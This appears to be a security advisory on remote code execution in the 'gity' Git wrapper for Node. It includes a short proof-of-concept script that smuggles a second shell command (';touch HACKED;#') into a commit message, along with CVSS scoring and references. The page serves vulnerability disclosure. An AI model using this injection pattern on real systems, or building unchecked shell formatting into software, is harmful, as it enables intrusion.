Remote Code Execution (RCE)

Affecting gity package, ALL versions

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

gity is a Git wrapper for Node.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). A user input is formatted inside a command that will be executed without any check.

PoC by mik317

  • Create the following PoC file:
    // poc.js
    var Git = require('gity');
    

var git = Git() .add('*.js') .commit('-m "added js files";touch HACKED;#') .run();


* Check there aren't files called `HACKED`
* Execute the following commands in another terminal:

npm i gity # Install affected module node poc.js # Run the PoC

* Recheck the files: now `HACKED` has been created
## Remediation
There is no fixed version for `gity`.
## References
- [HackerOne Report](https://hackerone.com/reports/730111)
- [Vulnerable Code](https://hackerone.com/redirect?signature=83666e53042da3c66e97c9afe213f17e5c0d75b0&url=https%3A%2F%2Fgithub.com%2Fstevenmiller888%2Fgity%2Fblob%2Fmaster%2Flib%2Findex.js%23L85)

CVSS Score

6.4
medium severity
  • Attack Vector
    Local
  • Attack Complexity
    High
  • Privileges Required
    High
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
Credit
mik317
CWE
CWE-94
Snyk ID
SNYK-JS-GITY-1012730
Disclosed
24 Sep, 2020
Published
25 Sep, 2020